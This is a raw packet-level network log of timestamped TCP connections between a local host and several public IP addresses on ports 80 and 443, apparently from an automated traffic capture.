                                                                                                                                                              Mar 13, 2023 05:26:40.464431047 CET49879443192.168.2.3104.192.108.23
                                                                                                                                                              Mar 13, 2023 05:26:40.464488983 CET44349879104.192.108.23192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:40.464488029 CET49880443192.168.2.323.251.32.116
                                                                                                                                                              Mar 13, 2023 05:26:40.464551926 CET4434988023.251.32.116192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:40.465164900 CET4434988023.251.32.116192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:40.465751886 CET44349879104.192.108.23192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:40.465960026 CET49880443192.168.2.323.251.32.116
                                                                                                                                                              Mar 13, 2023 05:26:40.466017962 CET4434988023.251.32.116192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:40.466133118 CET4434988023.251.32.116192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:40.466686964 CET49879443192.168.2.3104.192.108.23
                                                                                                                                                              Mar 13, 2023 05:26:40.466774940 CET44349879104.192.108.23192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:40.466968060 CET44349879104.192.108.23192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:40.473272085 CET4970880192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:26:40.473463058 CET4970680192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:26:40.473509073 CET4970780192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:26:40.473608017 CET4970380192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:26:40.546245098 CET49879443192.168.2.3104.192.108.23
                                                                                                                                                              Mar 13, 2023 05:26:40.547458887 CET49880443192.168.2.323.251.32.116
                                                                                                                                                              Mar 13, 2023 05:26:40.559194088 CET804970859.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:40.612037897 CET804972839.156.68.163192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:40.612149954 CET4972880192.168.2.339.156.68.163
                                                                                                                                                              Mar 13, 2023 05:26:40.782104969 CET804970659.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:40.782171011 CET804970659.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:40.782246113 CET4970680192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:26:40.792848110 CET804970759.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:40.792902946 CET804970759.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:40.792951107 CET804970759.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:40.792972088 CET4970780192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:26:40.793010950 CET804970759.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:40.793073893 CET4970780192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:26:40.793175936 CET804970759.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:40.793272972 CET804970759.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:40.793339014 CET4970780192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:26:40.793397903 CET804970759.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:40.797244072 CET804970859.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:40.797291040 CET804970859.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:40.797383070 CET4970880192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:26:40.797386885 CET804970859.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:40.797482014 CET804970859.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:40.797549009 CET4970880192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:26:40.797621965 CET804970859.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:40.797728062 CET804970859.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:40.797801018 CET4970880192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:26:40.797847986 CET804970859.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:40.797935009 CET804970859.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:40.798002958 CET4970880192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:26:40.798033953 CET804970859.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:40.798139095 CET804970859.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:40.798213005 CET4970880192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:26:40.805717945 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:40.805766106 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:40.805856943 CET4970380192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:26:40.887310982 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:40.887362957 CET804970659.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:40.929960012 CET4970780192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:26:40.995861053 CET804970759.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:40.995927095 CET804970759.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:40.995973110 CET804970759.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:40.996018887 CET804970759.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:40.996021032 CET4970780192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:26:40.996085882 CET4970780192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:26:40.996109962 CET804970759.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:40.996226072 CET804970759.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:40.996304035 CET4970780192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:26:40.996618032 CET804970759.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:40.996653080 CET804970859.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:41.000180960 CET804970859.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:41.000240088 CET804970859.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:41.000286102 CET804970859.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:41.000313997 CET4970880192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:26:41.000427008 CET804970859.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:41.000499964 CET4970880192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:26:41.000543118 CET804970859.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:41.000626087 CET804970859.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:41.000693083 CET4970880192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:26:41.000756979 CET804970859.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:41.000844955 CET804970859.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:41.000910997 CET4970880192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:26:41.000979900 CET804970859.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:41.001087904 CET804970859.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:41.001159906 CET4970880192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:26:41.001220942 CET804970859.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:41.046247005 CET4970880192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:26:41.132936001 CET804970759.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:41.132999897 CET804970759.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:41.133153915 CET4970780192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:26:41.198993921 CET804970759.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:41.199048996 CET804970759.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:41.199134111 CET4970780192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:26:41.203180075 CET804970859.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:41.203243971 CET804970859.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:41.203313112 CET804970859.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:41.203321934 CET4970880192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:26:41.203414917 CET804970859.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:41.203504086 CET4970880192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:26:41.203526020 CET804970859.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:41.203613043 CET804970859.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:41.203680038 CET4970880192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:26:41.203733921 CET804970859.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:41.203821898 CET804970859.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:41.203881979 CET4970880192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:26:41.203962088 CET804970859.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:41.204083920 CET804970859.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:41.204142094 CET4970880192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:26:41.240268946 CET4970780192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:26:41.249149084 CET804970859.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:41.346272945 CET4970880192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:26:41.406228065 CET804970859.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:41.406310081 CET804970859.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:41.406358957 CET804970859.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:41.406398058 CET4970880192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:26:41.406404972 CET804970859.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:41.406478882 CET4970880192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:26:41.406541109 CET804970859.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:41.406604052 CET804970859.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:41.406667948 CET4970880192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:26:41.417548895 CET4970880192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:26:41.465348005 CET804970759.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:41.497806072 CET4970780192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:26:41.504580021 CET4970380192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:26:41.584503889 CET8049814171.8.167.89192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:41.584599018 CET4981480192.168.2.3171.8.167.89
                                                                                                                                                              Mar 13, 2023 05:26:41.638750076 CET804970859.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:41.638818979 CET804970859.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:41.638866901 CET804970859.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:41.638899088 CET4970880192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:26:41.638911963 CET804970859.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:41.638971090 CET4970880192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:26:41.639091969 CET804970859.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:41.639137983 CET804970859.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:41.639221907 CET4970880192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:26:41.639223099 CET804970859.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:41.639362097 CET804970859.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:41.639414072 CET804970859.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:41.639435053 CET4970880192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:26:41.639574051 CET804970859.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:41.639647007 CET4970880192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:26:41.639659882 CET804970859.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:41.639766932 CET804970859.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:41.639841080 CET4970880192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:26:41.704111099 CET804970759.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:41.704174042 CET804970759.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:41.704462051 CET4970780192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:26:41.709136963 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:41.728769064 CET4981480192.168.2.3171.8.167.89
                                                                                                                                                              Mar 13, 2023 05:26:41.842089891 CET804970859.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:41.842150927 CET804970859.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:41.842288017 CET4970880192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:26:41.846436977 CET4970380192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:26:41.871831894 CET804970859.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:41.908654928 CET804970759.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:41.908716917 CET804970759.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:41.908751011 CET4970780192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:26:41.908812046 CET4970780192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:26:41.977478981 CET8049814171.8.167.89192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:41.981092930 CET804970759.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:42.045166016 CET804970859.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:42.045219898 CET804970859.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:42.045335054 CET4970880192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:26:42.048295021 CET4970880192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:26:42.111733913 CET804970759.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:42.111795902 CET804970759.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:42.111829996 CET804970759.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:42.111901999 CET804970759.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:42.111951113 CET804970759.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:42.112006903 CET4970780192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:26:42.112006903 CET4970780192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:26:42.112076044 CET804970759.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:42.112144947 CET4970780192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:26:42.112189054 CET804970759.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:42.112206936 CET4970780192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:26:42.112298965 CET4970780192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:26:42.251179934 CET804970859.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:42.251240969 CET804970859.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:42.251307964 CET804970859.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:42.251355886 CET804970859.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:42.251378059 CET4970880192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:26:42.251378059 CET4970880192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:26:42.251446962 CET4970880192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:26:42.251446962 CET4970880192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:26:42.251456976 CET804970859.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:42.251526117 CET4970880192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:26:42.251614094 CET804970859.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:42.251697063 CET804970859.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:42.251769066 CET4970880192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:26:42.251811981 CET804970859.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:42.251986980 CET804970859.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:42.252074957 CET4970880192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:26:42.252192974 CET804970859.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:42.253473997 CET4970880192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:26:42.264367104 CET4970880192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:26:42.265053988 CET4970380192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:26:42.265671015 CET4970680192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:26:42.315131903 CET804970759.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:42.315196037 CET804970759.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:42.315341949 CET4970780192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:26:42.469615936 CET804970859.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:42.469701052 CET804970859.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:42.469762087 CET804970859.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:42.469825983 CET4970880192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:26:42.469842911 CET804970859.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:42.470016956 CET804970859.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:42.470067978 CET804970859.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:42.470089912 CET4970880192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:26:42.470509052 CET804970659.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:42.470571041 CET804970659.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:42.470637083 CET4970880192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:26:42.470649958 CET4970680192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:26:42.480875015 CET4970680192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:26:42.481144905 CET4970880192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:26:42.504267931 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:42.504364014 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:42.504426956 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:42.504487038 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:42.504584074 CET4970380192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:26:42.504585028 CET4970380192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:26:42.504595041 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:42.504754066 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:42.509547949 CET4970380192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:26:42.518167019 CET804970759.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:42.518263102 CET804970759.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:42.518340111 CET4970780192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:26:42.521471977 CET4970780192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:26:42.547708035 CET4970380192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:26:42.637373924 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:42.685996056 CET804970659.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:42.686073065 CET804970659.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:42.686140060 CET804970659.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:42.686145067 CET4970680192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:26:42.686187029 CET804970659.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:42.686328888 CET804970659.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:42.686330080 CET4970680192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:26:42.686368942 CET804970659.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:42.686436892 CET4970680192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:26:42.686475039 CET804970859.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:42.686517000 CET804970859.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:42.686598063 CET4970880192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:26:42.721342087 CET804970759.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:42.721661091 CET4970780192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:26:42.724282980 CET804970759.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:42.724334002 CET804970759.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:42.724390984 CET4970780192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:26:42.724390984 CET4970780192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:26:42.724461079 CET804970759.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:42.724545956 CET4970780192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:26:42.752635002 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:42.752697945 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:42.752746105 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:42.752984047 CET4970380192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:26:42.856090069 CET804970859.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:42.856139898 CET804970659.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:42.924513102 CET804970759.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:42.927357912 CET804970759.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:42.927411079 CET804970759.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:42.927511930 CET4970780192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:26:43.028198004 CET4970780192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:26:43.090449095 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:43.130358934 CET804970759.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:43.130434990 CET804970759.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:43.130537987 CET4970780192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:26:43.219857931 CET804972639.156.68.163192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:43.231744051 CET804970759.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:43.328088999 CET4970780192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:26:43.333901882 CET804970759.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:43.333986044 CET804970759.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:43.334034920 CET804970759.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:43.334191084 CET4970780192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:26:43.431427956 CET804972239.156.68.163192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:43.512805939 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:43.531578064 CET804970759.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:43.537281036 CET804970759.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:43.537343979 CET804970759.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:43.537389040 CET804970759.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:43.537409067 CET4970780192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:26:43.537468910 CET4970780192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:26:43.646478891 CET4970380192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:26:43.740406990 CET804970759.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:43.740477085 CET804970759.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:43.740524054 CET804970759.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:43.740575075 CET804970759.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:43.740621090 CET804970759.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:43.740638018 CET4970780192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:26:43.740638018 CET4970780192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:26:43.831609964 CET4970780192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:26:43.849538088 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:43.849601030 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:43.849737883 CET4970380192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:26:43.943506956 CET804970759.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:43.943562031 CET804970759.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:43.943612099 CET804970759.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:43.943685055 CET4970780192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:26:43.943744898 CET804970759.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:43.943814039 CET4970780192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:26:44.034641027 CET804970759.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:44.127511978 CET4970780192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:26:44.146636009 CET804970759.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:44.146718025 CET804970759.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:44.146770000 CET804970759.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:44.146797895 CET4970780192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:26:44.146816015 CET804970759.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:44.146879911 CET4970780192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:26:44.330539942 CET804970759.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:44.330605984 CET804970759.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:44.330758095 CET4970780192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:26:44.349659920 CET804970759.188.3.132192.168.2.3
